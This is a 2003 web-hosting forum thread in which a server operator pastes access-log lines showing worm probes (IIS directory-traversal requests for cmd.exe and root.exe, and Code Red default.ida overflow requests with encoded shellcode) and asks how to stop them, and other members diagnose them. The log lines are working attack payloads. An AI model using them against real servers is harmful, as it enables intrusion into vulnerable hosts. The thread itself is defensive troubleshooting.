Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

How to stop this process?

Discussion in 'General Discussion' started by tekdns, Jun 15, 2003.

  1. tekdns

    tekdns Well-Known Member

    Joined:
    Jun 9, 2002
    Messages:
    100
    Likes Received:
    0
    Trophy Points:
    316
    Hi,


    How to stop/block these below process;

    "12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:51 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 -
    127.0.0.1 - - [15/Jun/2003:04:35:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17184
    127.0.0.1 - - [15/Jun/2003:04:37:30 -0400] "GET / HTTP/1.0" 200 2673
    66.168.234.28 - - [15/Jun/2003:04:39:34 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:40:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17559
    218.70.224.215 - - [15/Jun/2003:04:40:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    217.219.246.4 - - [15/Jun/2003:04:44:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.190.164.146 - - [15/Jun/2003:04:44:56 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:57 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17966
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:02 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:04 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.190.164.146 - - [15/Jun/2003:04:45:05 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:07 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:08 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:09 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:50 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:50:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18253
    66.82.121.147 - - [15/Jun/2003:04:51:49 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:54:11 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:55:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18059
    66.227.42.208 - - [15/Jun/2003:04:57:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.31.55.164 - - [15/Jun/2003:04:57:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:47 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.126.168.169 - - [15/Jun/2003:04:57:48 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    24.130.75.129 - - [15/Jun/2003:04:58:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:05:00:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18040
    127.0.0.1 - - [15/Jun/2003:05:02:31 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:05:05:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18264
    12.224.137.0 - - [15/Jun/2003:05:08:53 -0400] "GET /..%255c..%280
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/

    ....................."

    Becouse, after these process, my server down.

    Thanks for your help

    cPanel.net Support Ticket Number:
     
  2. promak

    promak Well-Known Member

    Joined:
    Oct 6, 2001
    Messages:
    248
    Likes Received:
    0
    Trophy Points:
    316
    This is code red
    try to search code red in this forums .

    cPanel.net Support Ticket Number:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. tAzMaNiAc

    tAzMaNiAc Well-Known Member

    Joined:
    Feb 16, 2003
    Messages:
    559
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Sachse, TX
    Those processes havenothing to do with why your server went down. Those are windows machines looking to attack windows machines with the IIS vulnerabilities.

    Unless you are running IIS and some strange configuration (CPanel DOES Not run IIS :-D), this is not the problem..

    Brenden

    cPanel.net Support Ticket Number:
     
  4. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,505
    Likes Received:
    1
    Trophy Points:
    318
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    It is possible that too many connection attempts were coming in too fast, creating a 'mini' DDOS attack. A brief look showed double-digit attempts per second.

    Do a search on this forum for 'sumthin' as there is some good information in one of the posts about what to do in these type situations.

    cPanel.net Support Ticket Number:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice